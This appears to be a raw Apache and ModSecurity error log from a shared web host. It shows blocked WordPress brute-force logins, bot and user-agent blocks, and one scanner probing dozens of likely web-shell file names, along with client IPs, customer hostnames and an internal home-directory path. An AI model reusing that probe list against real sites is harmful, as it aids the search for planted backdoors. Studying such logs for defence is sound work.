[Tue May 26 19:00:58.669881 2026] [security2:error] [pid 1045635:tid 1045840] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgkhhDcQXYr7SS5sUS5gAAS1k"]
[Tue May 26 19:01:00.702149 2026] [security2:error] [pid 1045635:tid 1045832] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWglBhDcQXYr7SS5sUTDgAAAEM"]
[Tue May 26 19:01:03.129723 2026] [security2:error] [pid 1045635:tid 1045824] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWglhhDcQXYr7SS5sUTRAAAADs"]
[Tue May 26 19:01:05.124810 2026] [security2:error] [pid 1045635:tid 1045866] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgmBhDcQXYr7SS5sUTcgAAAGU"]
[Tue May 26 19:01:05.685561 2026] [security2:error] [pid 1045635:tid 1045638] [remote 194.213.4.139:59728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgmRhDcQXYr7SS5sUThwAAEgI"]
[Tue May 26 19:01:05.985833 2026] [security2:error] [pid 1045635:tid 1045644] [remote 194.213.4.139:59728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgmRhDcQXYr7SS5sUTmwAAfAg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:01:06.406846 2026] [security2:error] [pid 1045635:tid 1045760] [remote 92.205.109.21:41842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWgmhhDcQXYr7SS5sUTnwAAaXw"]
[Tue May 26 19:01:07.139340 2026] [security2:error] [pid 1045635:tid 1045837] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgmhhDcQXYr7SS5sUTsgAAAEg"]
[Tue May 26 19:01:07.228430 2026] [security2:error] [pid 1045635:tid 1045639] [remote 92.205.109.21:41842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWgmxhDcQXYr7SS5sUTugAAOgM"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:01:08.448916 2026] [security2:error] [pid 1045635:tid 1045865] [client 161.115.235.124:35509] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "www.kardashevtechnologies.com"] [uri "/"] [unique_id "ahWgnBhDcQXYr7SS5sUT4AAAAGQ"]
[Tue May 26 19:01:08.468845 2026] [security2:error] [pid 1045635:tid 1045647] [remote 109.228.50.118:54370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgnBhDcQXYr7SS5sUT3AAATws"]
[Tue May 26 19:01:09.159583 2026] [security2:error] [pid 1045635:tid 1045653] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgnRhDcQXYr7SS5sUT7gAABhE"]
[Tue May 26 19:01:09.159741 2026] [security2:error] [pid 1045635:tid 1045771] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgnRhDcQXYr7SS5sUT7gAABhE"]
[Tue May 26 19:01:10.028306 2026] [security2:error] [pid 1045635:tid 1045833] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgnRhDcQXYr7SS5sUT_gAAAEQ"]
[Tue May 26 19:01:11.309221 2026] [security2:error] [pid 1045635:tid 1045875] [client 205.185.124.118:64838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.124.185.205.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-login.php"] [unique_id "ahWgnhhDcQXYr7SS5sUUHAAAAG4"]
[Tue May 26 19:01:12.167244 2026] [security2:error] [pid 1045635:tid 1045778] [client 74.7.241.172:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "moremi.taotechservices.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWgoBhDcQXYr7SS5sUUSAAAAA0"]
[Tue May 26 19:01:12.167873 2026] [security2:error] [pid 1045635:tid 1045886] [client 74.7.241.172:51874] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "moremi.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWgoBhDcQXYr7SS5sUURgAAeRg"]
[Tue May 26 19:01:12.314319 2026] [security2:error] [pid 1045635:tid 1045813] [client 161.115.239.74:54577] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "kardashevtechnologies.com"] [uri "/"] [unique_id "ahWgoBhDcQXYr7SS5sUUSQAAADA"]
[Tue May 26 19:01:12.340587 2026] [security2:error] [pid 1045635:tid 1045803] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgnxhDcQXYr7SS5sUUPwAAACY"]
[Tue May 26 19:01:12.549451 2026] [autoindex:error] [pid 1045635:tid 1045835] [client 74.7.227.30:0] AH01276: Cannot serve directory /home1/taote1zo/moremi.taotechservices.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:01:13.049099 2026] [proxy:error] [pid 1045635:tid 1045842] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:01:13.049157 2026] [proxy_http:error] [pid 1045635:tid 1045842] [client 205.210.31.202:60160] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:01:13.049747 2026] [proxy:error] [pid 1045635:tid 1045842] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:01:13.049779 2026] [proxy_http:error] [pid 1045635:tid 1045842] [client 205.210.31.202:60160] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:01:13.339000 2026] [security2:error] [pid 1045635:tid 1045797] [client 66.249.66.7:49297] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "tickerbell.tech"] [uri "/robots.txt"] [unique_id "ahWgoRhDcQXYr7SS5sUUawAAACA"]
[Tue May 26 19:01:13.568561 2026] [security2:error] [pid 1045635:tid 1045765] [client 43.172.195.124:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWgoRhDcQXYr7SS5sUUcAAAAAA"]
[Tue May 26 19:01:14.016821 2026] [security2:error] [pid 1045635:tid 1045779] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgoRhDcQXYr7SS5sUUeQAAAA4"]
[Tue May 26 19:01:16.302287 2026] [security2:error] [pid 1045635:tid 1045827] [client 20.151.130.61:19421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWgpBhDcQXYr7SS5sUUswAAAD4"]
[Tue May 26 19:01:16.302428 2026] [security2:error] [pid 1045635:tid 1045827] [client 20.151.130.61:19421] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWgpBhDcQXYr7SS5sUUswAAAD4"]
[Tue May 26 19:01:16.734579 2026] [security2:error] [pid 1045635:tid 1045778] [client 20.151.130.61:19616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWgpBhDcQXYr7SS5sUUvwAAAA0"]
[Tue May 26 19:01:16.734738 2026] [security2:error] [pid 1045635:tid 1045778] [client 20.151.130.61:19616] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWgpBhDcQXYr7SS5sUUvwAAAA0"]
[Tue May 26 19:01:16.945604 2026] [security2:error] [pid 1045635:tid 1045847] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgpBhDcQXYr7SS5sUUugAAAFI"]
[Tue May 26 19:01:16.984856 2026] [security2:error] [pid 1045635:tid 1045884] [client 20.151.130.61:38341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wpconf.php"] [unique_id "ahWgpBhDcQXYr7SS5sUUygAAAHc"]
[Tue May 26 19:01:16.984978 2026] [security2:error] [pid 1045635:tid 1045884] [client 20.151.130.61:38341] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wpconf.php"] [unique_id "ahWgpBhDcQXYr7SS5sUUygAAAHc"]
[Tue May 26 19:01:17.393731 2026] [security2:error] [pid 1045635:tid 1045885] [client 20.151.130.61:38353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/aaf.php"] [unique_id "ahWgpRhDcQXYr7SS5sUU2QAAAHg"]
[Tue May 26 19:01:17.393822 2026] [security2:error] [pid 1045635:tid 1045885] [client 20.151.130.61:38353] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/aaf.php"] [unique_id "ahWgpRhDcQXYr7SS5sUU2QAAAHg"]
[Tue May 26 19:01:17.676327 2026] [security2:error] [pid 1045635:tid 1045767] [client 20.151.130.61:19402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wander.php"] [unique_id "ahWgpRhDcQXYr7SS5sUU4AAAAAI"]
[Tue May 26 19:01:17.676498 2026] [security2:error] [pid 1045635:tid 1045767] [client 20.151.130.61:19402] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wander.php"] [unique_id "ahWgpRhDcQXYr7SS5sUU4AAAAAI"]
[Tue May 26 19:01:18.194844 2026] [security2:error] [pid 1045635:tid 1045701] [remote 123.30.233.13:38762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgpRhDcQXYr7SS5sUU7QAAO0E"]
[Tue May 26 19:01:18.229110 2026] [security2:error] [pid 1045635:tid 1045702] [remote 167.172.25.98:37060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgphhDcQXYr7SS5sUU7gAASEI"]
[Tue May 26 19:01:18.265783 2026] [security2:error] [pid 1045635:tid 1045704] [remote 50.6.207.27:58162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgphhDcQXYr7SS5sUU8AAAV0Q"]
[Tue May 26 19:01:18.487067 2026] [security2:error] [pid 1045635:tid 1045839] [client 20.151.130.61:31350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/gptsh.php"] [unique_id "ahWgphhDcQXYr7SS5sUU_AAAAEo"]
[Tue May 26 19:01:18.487214 2026] [security2:error] [pid 1045635:tid 1045839] [client 20.151.130.61:31350] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/gptsh.php"] [unique_id "ahWgphhDcQXYr7SS5sUU_AAAAEo"]
[Tue May 26 19:01:18.684130 2026] [security2:error] [pid 1045635:tid 1045835] [client 20.151.130.61:19429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/xocx.php"] [unique_id "ahWgphhDcQXYr7SS5sUU_QAAAEY"]
[Tue May 26 19:01:18.684238 2026] [security2:error] [pid 1045635:tid 1045835] [client 20.151.130.61:19429] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/xocx.php"] [unique_id "ahWgphhDcQXYr7SS5sUU_QAAAEY"]
[Tue May 26 19:01:18.896754 2026] [security2:error] [pid 1045635:tid 1045812] [client 20.151.130.61:31301] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/155.php"] [unique_id "ahWgphhDcQXYr7SS5sUVBQAAAC8"]
[Tue May 26 19:01:18.896867 2026] [security2:error] [pid 1045635:tid 1045812] [client 20.151.130.61:31301] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/155.php"] [unique_id "ahWgphhDcQXYr7SS5sUVBQAAAC8"]
[Tue May 26 19:01:19.169284 2026] [security2:error] [pid 1045635:tid 1045784] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgphhDcQXYr7SS5sUVAAAAABM"]
[Tue May 26 19:01:19.273912 2026] [security2:error] [pid 1045635:tid 1045802] [client 20.151.130.61:19451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/colay.php"] [unique_id "ahWgpxhDcQXYr7SS5sUVCQAAACU"]
[Tue May 26 19:01:19.274037 2026] [security2:error] [pid 1045635:tid 1045802] [client 20.151.130.61:19451] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/colay.php"] [unique_id "ahWgpxhDcQXYr7SS5sUVCQAAACU"]
[Tue May 26 19:01:19.540244 2026] [security2:error] [pid 1045635:tid 1045842] [client 20.151.130.61:31342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/hly.php"] [unique_id "ahWgpxhDcQXYr7SS5sUVEAAAAE0"]
[Tue May 26 19:01:19.540371 2026] [security2:error] [pid 1045635:tid 1045842] [client 20.151.130.61:31342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/hly.php"] [unique_id "ahWgpxhDcQXYr7SS5sUVEAAAAE0"]
[Tue May 26 19:01:19.842900 2026] [security2:error] [pid 1045635:tid 1045816] [client 20.151.130.61:19446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/ppp.php"] [unique_id "ahWgpxhDcQXYr7SS5sUVGAAAADM"]
[Tue May 26 19:01:19.843018 2026] [security2:error] [pid 1045635:tid 1045816] [client 20.151.130.61:19446] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/ppp.php"] [unique_id "ahWgpxhDcQXYr7SS5sUVGAAAADM"]
[Tue May 26 19:01:20.260026 2026] [security2:error] [pid 1045635:tid 1045790] [client 20.151.130.61:31339] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWgqBhDcQXYr7SS5sUVHgAAABk"]
[Tue May 26 19:01:20.260144 2026] [security2:error] [pid 1045635:tid 1045790] [client 20.151.130.61:31339] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWgqBhDcQXYr7SS5sUVHgAAABk"]
[Tue May 26 19:01:20.541460 2026] [security2:error] [pid 1045635:tid 1045798] [client 20.151.130.61:31304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWgqBhDcQXYr7SS5sUVLwAAACE"]
[Tue May 26 19:01:20.541590 2026] [security2:error] [pid 1045635:tid 1045798] [client 20.151.130.61:31304] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWgqBhDcQXYr7SS5sUVLwAAACE"]
[Tue May 26 19:01:20.616033 2026] [security2:error] [pid 1045635:tid 1045688] [remote 50.6.207.27:58162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgqBhDcQXYr7SS5sUVNAAAEjQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:01:20.682673 2026] [security2:error] [pid 1045635:tid 1045689] [remote 208.109.188.137:60136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWgqBhDcQXYr7SS5sUVLAAAIDU"]
[Tue May 26 19:01:20.804252 2026] [security2:error] [pid 1045635:tid 1045769] [client 37.138.4.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgqBhDcQXYr7SS5sUVKwAAAAQ"]
[Tue May 26 19:01:20.844784 2026] [security2:error] [pid 1045635:tid 1045774] [client 20.151.130.61:19400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWgqBhDcQXYr7SS5sUVQgAAAAk"]
[Tue May 26 19:01:20.844918 2026] [security2:error] [pid 1045635:tid 1045774] [client 20.151.130.61:19400] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWgqBhDcQXYr7SS5sUVQgAAAAk"]
[Tue May 26 19:01:21.221753 2026] [security2:error] [pid 1045635:tid 1045877] [client 20.151.130.61:19447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWgqRhDcQXYr7SS5sUVTwAAAHA"]
